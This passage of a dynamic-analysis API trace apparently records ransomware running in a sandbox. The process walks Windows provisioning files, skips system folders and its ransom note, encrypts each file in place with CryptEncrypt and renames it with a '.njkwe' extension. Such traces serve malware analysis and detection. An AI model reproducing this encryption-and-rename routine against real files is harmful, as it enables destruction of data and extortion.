ftCreationTime.dwLowDateTime=0x9147664e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9147664e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9147664e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x30f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="568__Connections_Cellular_Digi.Mobil (Romania)_i0$(__MVID)@WAP.provxml", cAlternateFileName="568__C~1.PRO")) returned 1 [0082.152] lstrcmpiW (lpString1="568__Connections_Cellular_Digi.Mobil (Romania)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.152] lstrcmpiW (lpString1="568__Connections_Cellular_Digi.Mobil (Romania)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.152] lstrcmpiW (lpString1="568__Connections_Cellular_Digi.Mobil (Romania)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.152] lstrcmpiW (lpString1="568__Connections_Cellular_Digi.Mobil (Romania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.153] lstrcmpiW (lpString1="568__Connections_Cellular_Digi.Mobil (Romania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.153] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\568__Connections_Cellular_Digi.Mobil (Romania)_i0$(__MVID)@WAP.provxml") returned 164 [0082.153] StrStrIW (lpFirst="568__Connections_Cellular_Digi.Mobil (Romania)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.153] lstrcmpW (lpString1="568__Connections_Cellular_Digi.Mobil (Romania)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.153] lstrcmpW (lpString1="568__Connections_Cellular_Digi.Mobil (Romania)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.153] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\568__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.153] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\568__Connections_Cellular_Digi.Mobil (Romania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\568__connections_cellular_digi.mobil (romania)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.153] GetTickCount () returned 0x1154d80 [0082.153] GetTickCount () returned 0x1154d80 [0082.153] GetTickCount () returned 0x1154d80 [0082.153] GetTickCount () returned 0x1154d80 [0082.153] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.153] GetProcessHeap () returned 0xbe0000 [0082.153] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.153] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x30f, lpOverlapped=0x0) returned 1 [0082.155] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffcf1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.155] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x30f, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x30f, lpOverlapped=0x0) returned 1 [0082.155] GetProcessHeap () returned 0xbe0000 [0082.155] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.155] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.155] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.155] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.155] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.155] CloseHandle (hObject=0x444) returned 1 [0082.155] GetProcessHeap () returned 0xbe0000 [0082.155] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.155] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\568__Connections_Cellular_Digi.Mobil (Romania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0082.156] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\568__Connections_Cellular_Digi.Mobil (Romania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\568__connections_cellular_digi.mobil (romania)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\568__Connections_Cellular_Digi.Mobil (Romania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\568__connections_cellular_digi.mobil (romania)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.156] GetProcessHeap () returned 0xbe0000 [0082.156] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.156] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9147664e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9147664e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9147664e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x30b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="569__Connections_Cellular_TELEKOM.RO (Romania)_i0$(__MVID)@WAP.provxml", cAlternateFileName="569__C~1.PRO")) returned 1 [0082.156] lstrcmpiW (lpString1="569__Connections_Cellular_TELEKOM.RO (Romania)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.156] lstrcmpiW (lpString1="569__Connections_Cellular_TELEKOM.RO (Romania)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.156] lstrcmpiW (lpString1="569__Connections_Cellular_TELEKOM.RO (Romania)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.156] lstrcmpiW (lpString1="569__Connections_Cellular_TELEKOM.RO (Romania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.156] lstrcmpiW (lpString1="569__Connections_Cellular_TELEKOM.RO (Romania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.156] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\569__Connections_Cellular_TELEKOM.RO (Romania)_i0$(__MVID)@WAP.provxml") returned 164 [0082.156] StrStrIW (lpFirst="569__Connections_Cellular_TELEKOM.RO (Romania)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.156] lstrcmpW (lpString1="569__Connections_Cellular_TELEKOM.RO (Romania)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.156] lstrcmpW (lpString1="569__Connections_Cellular_TELEKOM.RO (Romania)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.157] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\569__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.157] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\569__Connections_Cellular_TELEKOM.RO (Romania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\569__connections_cellular_telekom.ro (romania)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.157] GetTickCount () returned 0x1154d90 [0082.157] GetTickCount () returned 0x1154d90 [0082.157] GetTickCount () returned 0x1154d90 [0082.157] GetTickCount () returned 0x1154d90 [0082.157] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.157] GetProcessHeap () returned 0xbe0000 [0082.157] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.157] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x30b, lpOverlapped=0x0) returned 1 [0082.159] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffcf5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.159] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x30b, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x30b, lpOverlapped=0x0) returned 1 [0082.159] GetProcessHeap () returned 0xbe0000 [0082.159] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.159] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.159] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.159] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.159] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.159] CloseHandle (hObject=0x444) returned 1 [0082.159] GetProcessHeap () returned 0xbe0000 [0082.160] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.160] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\569__Connections_Cellular_TELEKOM.RO (Romania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0082.160] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\569__Connections_Cellular_TELEKOM.RO (Romania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\569__connections_cellular_telekom.ro (romania)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\569__Connections_Cellular_TELEKOM.RO (Romania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\569__connections_cellular_telekom.ro (romania)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.160] GetProcessHeap () returned 0xbe0000 [0082.160] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.160] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x902ba650, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x902ba650, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x902ba650, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="56__Connections_Cellular_Sercomtel (Brazil)_i0$(__MVID)@WAP.provxml", cAlternateFileName="56__CO~1.PRO")) returned 1 [0082.160] lstrcmpiW (lpString1="56__Connections_Cellular_Sercomtel (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.161] lstrcmpiW (lpString1="56__Connections_Cellular_Sercomtel (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.161] lstrcmpiW (lpString1="56__Connections_Cellular_Sercomtel (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.161] lstrcmpiW (lpString1="56__Connections_Cellular_Sercomtel (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.161] lstrcmpiW (lpString1="56__Connections_Cellular_Sercomtel (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.161] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\56__Connections_Cellular_Sercomtel (Brazil)_i0$(__MVID)@WAP.provxml") returned 161 [0082.161] StrStrIW (lpFirst="56__Connections_Cellular_Sercomtel (Brazil)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.161] lstrcmpW (lpString1="56__Connections_Cellular_Sercomtel (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.161] lstrcmpW (lpString1="56__Connections_Cellular_Sercomtel (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.161] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\56__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.161] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\56__Connections_Cellular_Sercomtel (Brazil)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\56__connections_cellular_sercomtel (brazil)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.161] GetTickCount () returned 0x1154d90 [0082.161] GetTickCount () returned 0x1154d90 [0082.161] GetTickCount () returned 0x1154d90 [0082.161] GetTickCount () returned 0x1154d90 [0082.161] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.161] GetProcessHeap () returned 0xbe0000 [0082.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.161] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0082.163] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.163] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0082.163] GetProcessHeap () returned 0xbe0000 [0082.163] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.163] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.163] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.163] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.163] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.163] CloseHandle (hObject=0x444) returned 1 [0082.163] GetProcessHeap () returned 0xbe0000 [0082.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.163] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\56__Connections_Cellular_Sercomtel (Brazil)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0082.163] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\56__Connections_Cellular_Sercomtel (Brazil)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\56__connections_cellular_sercomtel (brazil)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\56__Connections_Cellular_Sercomtel (Brazil)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\56__connections_cellular_sercomtel (brazil)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.164] GetProcessHeap () returned 0xbe0000 [0082.164] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.164] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9149c8b9, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9149c8b9, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9149c8b9, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x37c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="570__Connections_Cellular_TELEKOM.RO (Romania)_i1$(__MVID)@WAP.provxml", cAlternateFileName="570__C~1.PRO")) returned 1 [0082.164] lstrcmpiW (lpString1="570__Connections_Cellular_TELEKOM.RO (Romania)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.164] lstrcmpiW (lpString1="570__Connections_Cellular_TELEKOM.RO (Romania)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.164] lstrcmpiW (lpString1="570__Connections_Cellular_TELEKOM.RO (Romania)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.164] lstrcmpiW (lpString1="570__Connections_Cellular_TELEKOM.RO (Romania)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.164] lstrcmpiW (lpString1="570__Connections_Cellular_TELEKOM.RO (Romania)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.164] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\570__Connections_Cellular_TELEKOM.RO (Romania)_i1$(__MVID)@WAP.provxml") returned 164 [0082.164] StrStrIW (lpFirst="570__Connections_Cellular_TELEKOM.RO (Romania)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.164] lstrcmpW (lpString1="570__Connections_Cellular_TELEKOM.RO (Romania)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.164] lstrcmpW (lpString1="570__Connections_Cellular_TELEKOM.RO (Romania)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.164] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\570__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.164] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\570__Connections_Cellular_TELEKOM.RO (Romania)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\570__connections_cellular_telekom.ro (romania)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.165] GetTickCount () returned 0x1154d90 [0082.165] GetTickCount () returned 0x1154d90 [0082.165] GetTickCount () returned 0x1154d90 [0082.165] GetTickCount () returned 0x1154d90 [0082.165] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.165] GetProcessHeap () returned 0xbe0000 [0082.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.165] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x37c, lpOverlapped=0x0) returned 1 [0082.167] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffc84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.167] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x37c, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x37c, lpOverlapped=0x0) returned 1 [0082.167] GetProcessHeap () returned 0xbe0000 [0082.167] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.167] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.167] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.167] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.167] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.167] CloseHandle (hObject=0x444) returned 1 [0082.167] GetProcessHeap () returned 0xbe0000 [0082.167] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.167] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, 